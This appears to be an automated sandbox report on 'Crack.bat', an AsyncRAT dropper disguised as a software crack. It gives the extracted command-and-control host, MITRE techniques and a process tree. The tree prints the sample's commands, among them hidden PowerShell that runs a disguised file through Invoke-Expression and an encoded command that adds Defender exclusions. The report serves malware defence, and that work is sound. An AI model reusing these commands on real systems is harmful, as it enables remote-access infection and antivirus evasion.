Analysis
-
max time kernel
91s -
max time network
96s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
-
submitted
26/01/2025, 23:25
General
-
Target
lossless scaling/Crack.bat
-
Size
16KB
-
MD5
1f5ea98d27f9d4dfe7da57a12ab5cfb7
-
SHA1
2565fb81fe31c17562106ab046f9d8a8f1d0b3c5
-
SHA256
9dba4747cdba2b31fbbcd2c30ef3c71d2e63ae01a8cd1765d385d065bafa21e5
-
SHA512
3e35d5d4d2212376eeed7be09aaeb6ed200d644ef50122f586a51f130d027f3e54f7af9bd14ba184a0ffe4a13f4cb4dff9e5da776df24f7b710f665aece3dfe4
-
SSDEEP
192:wA7T3nY6jgx4v7UHKtg+NS+7iASgon5ydpakLNfW9FATzSdcO7lgtVhwqgc8Z+Co:nya1TwSaerstRGj
Malware Config
Extracted
asyncrat
A 14
Default
3x3.casacam.net:303
MaterxMutex_Egypt2
-
delay
3
-
install
false
-
install_folder
%AppData%
Signatures
-
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
-
Asyncrat family
-
UAC bypass 3 TTPs 1 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Using powershell.exe command.
-
Executes dropped EXE 4 IoCs
-
Uses the VBS compiler for execution 1 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Modifies registry class 1 IoCs
-
Runs net.exe
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 23 IoCs
-
Suspicious use of AdjustPrivilegeToken 7 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 61 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\lossless scaling\Crack.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet session2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session3⤵
-
-
-
C:\Windows\system32\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Temp\lossless scaling\\language\en-US" "C:\Users\Public\IObitUnlocker" /E /H /C /I2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "& {Get-Content 'C:\Users\Public\IObitUnlocker\UK.dll' | Out-String | Invoke-Expression}"2⤵
- UAC bypass
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /query /tn administrator3⤵
-
-
C:\Users\Public\IObitUnlocker\RAR.exe"C:\Users\Public\IObitUnlocker\RAR.exe" x -pahmad..123 -o+ C:\Users\Public\IObitUnlocker\EN.dll C:\Users\Public\IObitUnlocker\3⤵
- Executes dropped EXE
-
-
C:\Users\Public\IObitUnlocker\BR\Font.exe"C:\Users\Public\IObitUnlocker\BR\Font.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\esentutl.exe"C:\Users\Admin\AppData\Local\Microsoft\Windows\esentutl.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Public\IObitUnlocker\Loader.vbs"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass iex([IO.File]::ReadAllText('C:\Users\Public\IObitUnlocker\Report.ps1'))4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\jfmxvw.exe"' & exit6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\jfmxvw.exe"'7⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\jfmxvw.exe"C:\Users\Admin\AppData\Local\Temp\jfmxvw.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"6⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"6⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"6⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"6⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"6⤵
-
-
-
-
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /query /tn administrator3⤵
-
-
-
C:\Windows\system32\mode.commode con: cols=80 lines=102⤵
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwASABlAGwAcABMAGkAbgBrAFwAQwBlAHIAdABpAGYAaQBjAGEAdABlAC4AZQB4AGUALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwASABlAGwAcABMAGkAbgBrAFwAQwBlAHIAdABpAGYAaQBjAGEAdABlAC4AZQB4AGUA1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
1Disable or Modify Tools
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD52d83734c72d71baaccbb62283732230c
SHA1044ec913a2f01ef4f742a8f4e6c72eb0b7a7e791
SHA256eee2626e0fac98697432311487bf09b202f0c0464e79cefdfe26dcbacf267e73
SHA512dc5763e18f50a62d68841bf9a8aafeba16284bf39baaac64b1ed11050869667124ca580fbe5435a6e0e8ffde81f77bac8d7c5a742fe5afcb598732cb49236d6c
-
Filesize
1KB
MD53a141d5edc6567e3b56e1c9273f0076d
SHA1ddf1618d06bbf7fe48bc69f4e2e862d2bfef54e4
SHA2568f53305afb1216626d8d436deafa748a2fdb8065b0083f0a975fe26616bdd977
SHA512fb411fdc79d7d62b6e7385c49968abeb6751006708ada7e1bdee4a25d7bdd487b78d4cd195093d5507214c836e17aada661a03a2aac2f66f2c630940c130e8ff
-
Filesize
15KB
MD50ea2ab03545dfb9f0a4e42558c75ea15
SHA11b27bbe3dbea998f92002c4aa3396d93896f9000
SHA256cc98f9185115b44448ab55c574acd0033acba9859f70d2b7b4d036f7927ecaa5
SHA5128dfd8e812fadeaaccad4eeb261de3b69605837f063c4966b574d7b180b842e78190d1c2680a3a0f3573e9e8bd86a1c5771c195ac75e8f19d0ab9910bccfd92ca
-
Filesize
1KB
MD5b79a78d3bf286ebb83ad704dda679872
SHA16999ec126d252a7e6f2f50ed5dd1732d77ecf51c
SHA256fbc9435c7c3e3c363338acd0ea97d18ae73f78417c52e316e07b1427b56b9bca
SHA512c0830add5c2bd51529ffdb69825beffec9ecca260b0fe12b725ab9a37e17bdff6c1b2a53eac7ea672d0e061234d20c1a1cb1bddff670de942900dc1a52906922
-
Filesize
156KB
MD56981d94fbcc31ca50551300f5b4a96a3
SHA1e38b3a74f2951f5480fb67acc75d41f3e2b4f70e
SHA2568c19a90379611efc39c3e96529de2e82a99e3e049d36ef6563ec975836e47811
SHA512b94e87c641009ab8206c91ede3e35ab3b65a94fa3be5f4ce7c8a2b17af018f03801086c850427f4d51f4867a3d0a85aaf58ece9fd7f6a36f68df29da430c8d5d
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
628KB
MD51d53f5a867dd69486834f81a7a490a2d
SHA14154fe5c8e4b1a6141c8ea21b9f1a13ed7a4d91c
SHA256f804e0bf63f75b3a11c182054a8f02d4f9d2fb182c3a49b105dece388d8d06a1
SHA512769c1e9d9ab34bbd6ff3a0ee06d8e21a64e47861712bf92644a7f9f8d1b035dcf148a6d5d92da16ed82c720b0366e26fb93a0fef91e12a70c1790514bf2fe5c1
-
Filesize
434KB
MD568c9ee084cc409309b116ec6aea890a8
SHA1efd6aab18a08a63b146ad587d1fa08e0bb19bebc
SHA256ef2cbfdfdd874c6c3ea11223b369fbd5f155d20c680ae1e59ac74e6f1bb74a9d
SHA5129809477d42df7bbbaea04da5eda4a4f2ae3114b33541a4efd7003bab339d1c6ddf2f9a61b2ba781c0f5de82b030859c8ac76cbe697b296046227c1dc6b547a25
-
Filesize
181KB
MD5a435e2fb659a3596b017f556b53fa09d
SHA1c9ab6229bf239edac73593e0ffb53c1d9bb21686
SHA256e7f03b61cff5526877ea3f26f613caf5dbdf9006d49b98c906de3051067d7512
SHA512aa3fa16420e66bcdff349ba66791d7849a67d2ae720fdca4b3674ce2a8bffd7a1caae1a306c6533446950b0f8798d6cf7e37ec78ea199252028870fbc742f495
-
Filesize
308B
MD52993b76e0b0ba015caf654881638a0c0
SHA17fbd5f28fb2f6f948cbeb3c4dd5b0672bdfe4bcd
SHA2560e131f595ef67c160de9727d9a92a84b50393e66dd242f330736b916e1bf20a3
SHA512a61e0e7f92f0d78c27939ba21bdda6ff97503adc44e42a4b7eab3c4c1bea8acad4517b90db3430cabc237c2db01e60ab3a2a78e237ae01a896bd09aabba067cb
-
Filesize
629KB
MD5d3e9f98155c0faab869ccc74fb5e8a1e
SHA18e4feaad1d43306fdd8aa66efa443bca7afde710
SHA2563e0fdb5c40336482dacef3496116053d7772a51720900141b3c6f35c6e9b351b
SHA5122760c139ef276f406770675d89fb667f3369a9e1943a6eff2c18f391114018ad6fdce9daf0b499b18081ef22243ef04d74ff21cbd346eb31a1ddbcb79756697d
-
Filesize
457KB
MD5dd3f962ccc2f5b5f34700307e35138f8
SHA190d80df0ef716260a7d4ed466cf40caf966f0969
SHA256e273b5a8cf3d3d37ff676251aa4f41e3726b45b3280f8bf84bf618ca05cca9bb
SHA512619fba6cd9b8aae26db23f9cbd6db4870f969abd198d3fe8551703a1e2c46a9d1fd861f7b9462d82581b322209795c1e00762ebe31e0a1383c8a10df8e4a9eae
-
Filesize
5KB
MD53fffc04611766c3d49b9f0b74752a2b5
SHA1c70e6e3b2cd315e900f6dfdd5828cbf75b903fe5
SHA2567537dd03a875384bc79a7a21811e06ca97de3571631fc20b4b86b26baaafad9d
SHA5123ded3c5712f93eaa75fc9fe9469a02ece5996b6574d63b7b3a5db86db74762631e35aacae519ea3d23862bdaffab5e786696eeb812b0d1ce7f14b78f4539b4d8
-
Filesize
40KB
-
Filesize
456KB
-
Filesize
624KB
-
Filesize
344KB
-
Filesize
5.6MB
-
Filesize
584KB
-
Filesize
304KB
-
Filesize
216KB
-
Filesize
136KB
-
Filesize
104KB
-
Filesize
600KB
-
Filesize
120KB
-
Filesize
3.3MB
-
Filesize
408KB
-
Filesize
136KB
-
Filesize
6.2MB
-
Filesize
32KB
-
Filesize
24KB
-
Filesize
664KB
-
Filesize
4.8MB
-
Filesize
624KB
-
Filesize
304KB
-
Filesize
120KB
-
Filesize
472KB
-
Filesize
56KB
-
Filesize
88KB
-
Filesize
48KB
-
Filesize
408KB
-
Filesize
8KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
136KB
-
Filesize
10.8MB
-
Filesize
40KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
344KB
-
Filesize
304KB
-
Filesize
336KB
-
Filesize
992KB
-
Filesize
648KB